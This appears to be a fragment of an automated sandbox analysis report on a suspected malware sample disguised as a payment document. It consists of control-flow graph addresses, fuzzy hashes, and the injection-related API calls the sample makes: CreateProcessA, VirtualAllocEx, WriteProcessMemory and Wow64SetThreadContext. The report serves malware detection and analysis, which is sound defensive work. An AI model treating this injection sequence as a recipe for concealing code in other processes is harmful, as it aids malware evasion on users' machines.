                                  control_flow_graph 436 5654f88-5654ff8 438 5655031-5655051 436->438 439 5654ffa-5655004 436->439 446 5655053-565505d 438->446 447 565508a-56550c4 438->447 439->438 440 5655006-5655008 439->440 441 565502b-565502e 440->441 442 565500a-5655014 440->442 441->438 444 5655016 442->444 445 5655018-5655027 442->445 444->445 445->445 448 5655029 445->448 446->447 449 565505f-5655061 446->449 453 56550c6-56550d0 447->453 454 56550fd-5655172 CreateProcessA 447->454 448->441 451 5655084-5655087 449->451 452 5655063-565506d 449->452 451->447 455 5655071-5655080 452->455 456 565506f 452->456 453->454 457 56550d2-56550d4 453->457 466 5655174-565517a 454->466 467 565517b-56551c3 454->467 455->455 458 5655082 455->458 456->455 459 56550f7-56550fa 457->459 460 56550d6-56550e0 457->460 458->451 459->454 462 56550e4-56550f3 460->462 463 56550e2 460->463 462->462 464 56550f5 462->464 463->462 464->459 466->467 472 56551c5-56551c9 467->472 473 56551d3-56551d7 467->473 472->473 474 56551cb 472->474 475 56551e7-56551eb 473->475 476 56551d9-56551dd 473->476 474->473 477 56551ed-56551f1 475->477 478 56551fb 475->478 476->475 479 56551df 476->479 477->478 480 56551f3 477->480 481 56551fc 478->481 479->475 480->478 481->481
                                  APIs
                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 05655162
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1641964482.0000000005650000.00000040.00000800.00020000.00000000.sdmp, Offset: 05650000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5650000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: 46a8431be75ff8578ed1d0b763a66d940e7742b7f89fc305cdc9a9a271ecd248
                                  • Instruction ID: 8815107e1af3653181c27161800991affb1462a4ab66015ad3d56d04aedc9a35
                                  • Opcode Fuzzy Hash: 46a8431be75ff8578ed1d0b763a66d940e7742b7f89fc305cdc9a9a271ecd248
                                  • Instruction Fuzzy Hash: BD812671D002599FDB20DFA9C8897AEBBF2BF48324F148129EC56A7740E7758881CF81

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 482 5655ff3-5656046 485 5656056-5656095 WriteProcessMemory 482->485 486 5656048-5656054 482->486 488 5656097-565609d 485->488 489 565609e-56560ce 485->489 486->485 488->489
                                  APIs
                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 05656088
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1641964482.0000000005650000.00000040.00000800.00020000.00000000.sdmp, Offset: 05650000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5650000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: 13ed2ae632bbb9dd8d30ff9d3eeb68d5009c67e6243e96bb3a84bba018b9b223
                                  • Instruction ID: 8eb05c6c31cd5f61e37f91ac82b20fa96f94736b7117d222651b01a497ad23f6
                                  • Opcode Fuzzy Hash: 13ed2ae632bbb9dd8d30ff9d3eeb68d5009c67e6243e96bb3a84bba018b9b223
                                  • Instruction Fuzzy Hash: 0D2148719003099FDB10DFA9C981BEEBBF5FF48314F508429E959A7250C7799941CBA4

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 493 5655ff8-5656046 495 5656056-5656095 WriteProcessMemory 493->495 496 5656048-5656054 493->496 498 5656097-565609d 495->498 499 565609e-56560ce 495->499 496->495 498->499
                                  APIs
                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 05656088
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1641964482.0000000005650000.00000040.00000800.00020000.00000000.sdmp, Offset: 05650000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5650000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: 82a9332b24725c30b0803fbf472f2bda1079928c3df27cf4e089b29f9929ac81
                                  • Instruction ID: 9dac83887cb7a9e7e98eae52fe6f203c4d14ffa60e6b03a12ae7be9b72d3ee27
                                  • Opcode Fuzzy Hash: 82a9332b24725c30b0803fbf472f2bda1079928c3df27cf4e089b29f9929ac81
                                  • Instruction Fuzzy Hash: 4B2157719003099FDB10CFA9C981BEEBBF5FF48324F10842AE959A7250C7799941CBA4

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 511 5655743-5655793 514 5655795-56557a1 511->514 515 56557a3-56557a6 511->515 514->515 516 56557ad-56557d3 Wow64SetThreadContext 515->516 517 56557d5-56557db 516->517 518 56557dc-565580c 516->518 517->518
                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 056557C6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1641964482.0000000005650000.00000040.00000800.00020000.00000000.sdmp, Offset: 05650000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5650000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  • Opcode ID: 864eeb65802393ba1e2295674488dfc40f23aa0b0b793deb7596ec93e0f0e8f6
                                  • Instruction ID: 8f748910a8018b31adb0ee26848bea1541e856e0a1a6b1b4653b37ea6e54a0e2
                                  • Opcode Fuzzy Hash: 864eeb65802393ba1e2295674488dfc40f23aa0b0b793deb7596ec93e0f0e8f6
                                  • Instruction Fuzzy Hash: AA213471D003098FDB10DFAAC4857EEBBF4EF48224F14842AD85AA7641CB78A945CBA4

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 530 5655748-5655793 532 5655795-56557a1 530->532 533 56557a3-56557d3 Wow64SetThreadContext 530->533 532->533 535 56557d5-56557db 533->535 536 56557dc-565580c 533->536 535->536
                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 056557C6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1641964482.0000000005650000.00000040.00000800.00020000.00000000.sdmp, Offset: 05650000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5650000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  • Opcode ID: cd41a1ad1a507e68e381d8b6f7bd15fb3f1c48850af82675f2c4b48383e3575f
                                  • Instruction ID: dea1f536014dfeda01a86533da6f277afab195b84e98f6c722fba04ad98dd75c
                                  • Opcode Fuzzy Hash: cd41a1ad1a507e68e381d8b6f7bd15fb3f1c48850af82675f2c4b48383e3575f
                                  • Instruction Fuzzy Hash: 60211575D003098FDB10DFAAC4857EEBBF4EF48224F14842AD85AA7640CB78A945CFA5

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 548 5655d4b-5655d93 551 5655d9a-5655dcb VirtualAllocEx 548->551 552 5655dd4-5655df9 551->552 553 5655dcd-5655dd3 551->553 553->552
                                  APIs
                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05655DBE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1641964482.0000000005650000.00000040.00000800.00020000.00000000.sdmp, Offset: 05650000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5650000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 6ac728a35e5a79a6cc01f1e495097a518790abbb8c59d5f9af1b076c1ad898fc
                                  • Instruction ID: e00fa5cb3a86d7340b050347e679c7c5693c14e1287c8ab3b7aa15d4414911f9
                                  • Opcode Fuzzy Hash: 6ac728a35e5a79a6cc01f1e495097a518790abbb8c59d5f9af1b076c1ad898fc
                                  • Instruction Fuzzy Hash: 19116A729003499FDB20DFAAC845BEEBBF5FF48324F148419E915A7250CB75A540CFA4

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 565 5655d50-5655dcb VirtualAllocEx 568 5655dd4-5655df9 565->568 569 5655dcd-5655dd3 565->569 569->568
                                  APIs
                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05655DBE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1641964482.0000000005650000.00000040.00000800.00020000.00000000.sdmp, Offset: 05650000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5650000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: f1325a182555adc507ee95815d9c4ab5ae9f5727fa787b6c2ab23319af01028a
                                  • Instruction ID: 814ee5d1504c60cdfa2d9a176597acf26dfdf1718807d5edb32c64f69aa61e11
                                  • Opcode Fuzzy Hash: f1325a182555adc507ee95815d9c4ab5ae9f5727fa787b6c2ab23319af01028a
                                  • Instruction Fuzzy Hash: 10116A729003499FDB20DFAAC844BEEBBF5EF48324F108419D915A7250C775A540CFA4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1645566403.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6f10000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'q
                                  • API String ID: 0-1807707664
                                  • Opcode ID: 9c5b78494b5e6ed8f0f69d9b2920c9de1e5c58808783ffc05b75a250825b2f3e
                                  • Instruction ID: cb09d883c43ea82a330983943d2751566fb8af6da400d7d8852c7397be31ade5
                                  • Opcode Fuzzy Hash: 9c5b78494b5e6ed8f0f69d9b2920c9de1e5c58808783ffc05b75a250825b2f3e
                                  • Instruction Fuzzy Hash: 67217135B101249FCF48AFA4D854A6D7BB7FF8C310B1540A9EA0AAB361DB71DC12CB90
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1626452399.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_27e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 97e7211570f02b3d51abb8aed317ffe3c35d7a5366e35ea17c4172054b662da4
                                  • Instruction ID: 1b2759065ef85b6ce4dae73daf2e0501dbbb1b12219b3c186050603a8d417d15
                                  • Opcode Fuzzy Hash: 97e7211570f02b3d51abb8aed317ffe3c35d7a5366e35ea17c4172054b662da4
                                  • Instruction Fuzzy Hash: 79516A30A00104CFDF14DB69D58ABADB7F7FB8C310F9485A9D00AAB264EB759D45CB60
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1626452399.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_27e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 14d780d6570ce012194371dcff21ffd673b36f5795b28f4205488ddc56481d84
                                  • Instruction ID: bfd21f9415c4ce2705d20f8587368387cd0a4236e9825c64ea616841179e6fe0
                                  • Opcode Fuzzy Hash: 14d780d6570ce012194371dcff21ffd673b36f5795b28f4205488ddc56481d84
                                  • Instruction Fuzzy Hash: 8B512A34B00605CFDB04CB64C586B6AB3B3FB88310FA885B6D51A9B759D775EC81CBA0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1626452399.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_27e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1876a0814aa484552552468b4e9074f33de048f10521b0d3915db4eaa61ccef4
                                  • Instruction ID: 3b975c54f4048db8418c89e17b2b820e8dc719a8d50c5fcd877fdb948213cf71
                                  • Opcode Fuzzy Hash: 1876a0814aa484552552468b4e9074f33de048f10521b0d3915db4eaa61ccef4
                                  • Instruction Fuzzy Hash: AC516A30A00104CFDF14DB69D18ABADB7F7FB8C310F9485A5D00AAB2A4EB75AD45CB60
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1626452399.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_27e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 742d7a586aba2a4f31596a7e827e870dcff24cf0936d4f54f66d2e6cf3200e71
                                  • Instruction ID: 68209836e2c4c05795ae7dcd594277603e27b78439a3f69740ac75623aa78539
                                  • Opcode Fuzzy Hash: 742d7a586aba2a4f31596a7e827e870dcff24cf0936d4f54f66d2e6cf3200e71
                                  • Instruction Fuzzy Hash: 36413A30A00104CFDF14DF69D589BA977F7BB8C300F9485A5D00AAB2A4EBB49D45DB61
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1626452399.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_27e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2f62fe4ea2ad33c425dc9ec87ade494846bd972213c7348355a5f302ede4058b
                                  • Instruction ID: 4c3d61b7655d3dc5ccd5398fc9b220e61afca8d15c803431c7491a7cd504837c
                                  • Opcode Fuzzy Hash: 2f62fe4ea2ad33c425dc9ec87ade494846bd972213c7348355a5f302ede4058b
                                  • Instruction Fuzzy Hash: 433136B1D002499FDB10DFA9D590BEEBFF5EF48344F248029E809AB250DB349945CBA0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1626452399.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_27e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 116a5ff1ee52acf8ad7af3eeeb083ad56426c64b5b5b31986e3e11966689508e
                                  • Instruction ID: 11fa55a9554980f4d3445b80a7c32bd1159e692ba585ed8c691c8e71b3d1ddc9
                                  • Opcode Fuzzy Hash: 116a5ff1ee52acf8ad7af3eeeb083ad56426c64b5b5b31986e3e11966689508e
                                  • Instruction Fuzzy Hash: BF3124B1D002599FDF10DFAAD590BEEBFF5EF48344F248429E809AB250DB349941CBA0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1626452399.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_27e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 740e2bfbc6b842663254f4a000ac61f7c97f41c045f69833a6af8b9bc2768755
                                  • Instruction ID: 788bd241569b4468efa34405aed8e268ae6030f1769b7c0abbe35a95d2c4a50a
                                  • Opcode Fuzzy Hash: 740e2bfbc6b842663254f4a000ac61f7c97f41c045f69833a6af8b9bc2768755
                                  • Instruction Fuzzy Hash: F03147B0D05208DFDB40DFA9C048BAEBBF2EF4A304F1185B6D116A7255E7345A85CB62
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1626452399.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_27e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cee99d1d9d37bd2a01cf2cf4e1861e9d0450f80c6f95dda89e4340cd783e1693
                                  • Instruction ID: 1e486ac7c42270d6e0e4661a1a8fb08fa09afa9ae1b8604164f0717339fb8ac8
                                  • Opcode Fuzzy Hash: cee99d1d9d37bd2a01cf2cf4e1861e9d0450f80c6f95dda89e4340cd783e1693
                                  • Instruction Fuzzy Hash: 59314AB0D05208DFDB40DFA9C048BAEBBF6EB4E304F1181B5D11AA7245D7345A80CB62
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1645566403.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6f10000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: afdc165520450586638998d0c79798bc47f3856fabbea306840fb608ad0c4c63
                                  • Instruction ID: 4c4ad54eed2c5e6d1a03b4e06051991d4af46ce16cf4231a89776a15aefb6d87
                                  • Opcode Fuzzy Hash: afdc165520450586638998d0c79798bc47f3856fabbea306840fb608ad0c4c63
                                  • Instruction Fuzzy Hash: 16217AB1E0421A8FEB05CFA9D9446EEBBF5EB89304F148065CA15E3290D7749A40CF91
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1625845192.0000000000BAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BAD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bad000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 81652c1b1d057680ad1a59e9886faa35d77602325e33b4396103411f6f718790
                                  • Instruction ID: e4631e6979211e310f6be6ab1d787e8015ac908707148b46708a948c00d645d0
                                  • Opcode Fuzzy Hash: 81652c1b1d057680ad1a59e9886faa35d77602325e33b4396103411f6f718790
                                  • Instruction Fuzzy Hash: 73214971508240DFDB24DF10D9D4B27BBA5FB85314F20C6A9E80A4B652C336D847CBA2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1625845192.0000000000BAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BAD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bad000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 68817f137190cf59f09fc61006a41a24ee49a842145647537b5b747e999be800
                                  • Instruction ID: 273bbed625e4ae40ee5d5d6218938b5dce63d20a5f78a8e25ce930b280552ebb
                                  • Opcode Fuzzy Hash: 68817f137190cf59f09fc61006a41a24ee49a842145647537b5b747e999be800
                                  • Instruction Fuzzy Hash: 8721A4755093808FCB16CF10D994B15BFB1FB86314F2881EAD8458B657C33AD81ACB62
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1626452399.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_27e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e334d3324e22349da01e9bc6bed006461c709294ac905584f386b24a95a61ba1
                                  • Instruction ID: a445635c4e0c7d9745ac39d1c3f74b12b22804b12e4916dd40d16bb687fdc75a
                                  • Opcode Fuzzy Hash: e334d3324e22349da01e9bc6bed006461c709294ac905584f386b24a95a61ba1
                                  • Instruction Fuzzy Hash: B91123B1E04219CBCF14CFA9D8446EEBBBAFB8C310F10802AD506B3A50D7345A55CFA1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1645566403.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6f10000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ec4052038f87060ffb5b6c0ea41188404d4e595d10c99bd581803c4789d1ab12
                                  • Instruction ID: 9da8dc683e73bd352f86ca5a055e11e63cae975f1118c3202f9381e818b05409
                                  • Opcode Fuzzy Hash: ec4052038f87060ffb5b6c0ea41188404d4e595d10c99bd581803c4789d1ab12
                                  • Instruction Fuzzy Hash: 86219074E0520ADFCB84DFA8C144AAEBBF5FF49304F1084AAD919A7354DB359A41CFA1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1625744387.0000000000B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B9D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_b9d000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2de9c3bf7958eaac326ee78acf6cf378fd5185c68ed0ec8c73d9f1ab401eacbb
                                  • Instruction ID: d91ea04caa39eb5795e48feb4fd272b06da34b514ef5688245ad0ee5db27b003
                                  • Opcode Fuzzy Hash: 2de9c3bf7958eaac326ee78acf6cf378fd5185c68ed0ec8c73d9f1ab401eacbb
                                  • Instruction Fuzzy Hash: FC01A7315053449AEB204A66D8C4767FBD8EF41724F18C5AAED094A282C37CDC40CA72
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1645566403.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6f10000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cad94edcd2ca29cd929ad196d85d26c3cc0893546c3e997ba3e07c788fc623b4
                                  • Instruction ID: bbdd5ebce48239ef1f71fc7da1ab0444d7e1713c342f576e8f2f919b57d97ab3
                                  • Opcode Fuzzy Hash: cad94edcd2ca29cd929ad196d85d26c3cc0893546c3e997ba3e07c788fc623b4
                                  • Instruction Fuzzy Hash: 1EF0EC71E5561ADFDB94EFE9C8562ADB7F9BF49204F0094A9C819D7250FB709A00CF40
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1625744387.0000000000B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B9D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_b9d000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dca0078459d89b55e15af2d0005fa5a5710be7aa3b09b93451e579423e282f48
                                  • Instruction ID: 572b6556ddb797b04e76c3040be79c3e38117db790ed8c0497213942b1e01a6b
                                  • Opcode Fuzzy Hash: dca0078459d89b55e15af2d0005fa5a5710be7aa3b09b93451e579423e282f48
                                  • Instruction Fuzzy Hash: F8F06D72405344AEEB208A16D8C4B62FFE8EB51724F18C5AAED484F686C3799C44CAB1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1626452399.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_27e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 63443e1dbfbf52b2da9df570206855a4274170d633363414b784caf27ac0109e
                                  • Instruction ID: 56fc4569d802bb71558f9148f2721728c1ff77f7ad7ea1546e881e061d8e96ad
                                  • Opcode Fuzzy Hash: 63443e1dbfbf52b2da9df570206855a4274170d633363414b784caf27ac0109e
                                  • Instruction Fuzzy Hash: FCF0DF6609E3C18FD3035B709830986BF706E4721076E82EFD4C5CF8B3E628495AC322
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1645566403.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6f10000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2aaeda41c9678682022b4d42aec5ce803cf16cce077100feddabba93597be53d
                                  • Instruction ID: 67c05e9953f5c2111e15bc2b669d851b0c7f41e8b428d62461fe67ac9dbc802c
                                  • Opcode Fuzzy Hash: 2aaeda41c9678682022b4d42aec5ce803cf16cce077100feddabba93597be53d
                                  • Instruction Fuzzy Hash: 2A01E878A042188FCB68EF58C888AD9B7F2FB4D300F1081D5E909AB355CB309E80CF91
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1645566403.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6f10000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c1e4a2e238dcdc26f93426f85d704ed214d5be5822214975746ea265af726aa1
                                  • Instruction ID: a69786d16ada10bdda8f08ef43dd8748209b923f2d38e0096646c138960247d4
                                  • Opcode Fuzzy Hash: c1e4a2e238dcdc26f93426f85d704ed214d5be5822214975746ea265af726aa1
                                  • Instruction Fuzzy Hash: C4014F38D05228CFDB64DF14D858A9AB7F1FB49704F1080E5E549A7348CB389E81CF91
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1626452399.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_27e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: de738495808165fcac525d6cba10e91b8282566c2fce4c2f5f207cdc41725f44
                                  • Instruction ID: 10c74d34d668e1c7b3a03c00966f30193142a350630fba41c536079cdf042a38
                                  • Opcode Fuzzy Hash: de738495808165fcac525d6cba10e91b8282566c2fce4c2f5f207cdc41725f44
                                  • Instruction Fuzzy Hash: A0F01535E04208EFCB80DFA8C841A9CBBB5EB48300F10C0AADC09A3350D7359A11DF41
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1626452399.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_27e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6f96d879d9332b06a518530c37fb36911c882f2190f4ae24444efd48b58bebbb
                                  • Instruction ID: 49f3f51ff4f45a04187f9111baaf288f9adcedc95cdf41df83e8e54160579d73
                                  • Opcode Fuzzy Hash: 6f96d879d9332b06a518530c37fb36911c882f2190f4ae24444efd48b58bebbb
                                  • Instruction Fuzzy Hash: 2FE0E5783002018FDB04DB54C595B6ABB62BB88310FA586A4D5469F39AD772EC81CBA5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1645566403.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6f10000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fed78417b6592b6bbf5f332b31323a38f721c3961f933d9f0b39635eaa91431a
                                  • Instruction ID: 97c65986d69bba692d068d49609d7ed642761a4411752b4baef58b4d23aa2187
                                  • Opcode Fuzzy Hash: fed78417b6592b6bbf5f332b31323a38f721c3961f933d9f0b39635eaa91431a
                                  • Instruction Fuzzy Hash: 95E0E574E04208EFCB84DFA8D941AACFBF4EB49300F10C0AA9808A3351D6359A55DF80
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1645566403.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                  Joe Sandbox IDA Plugin
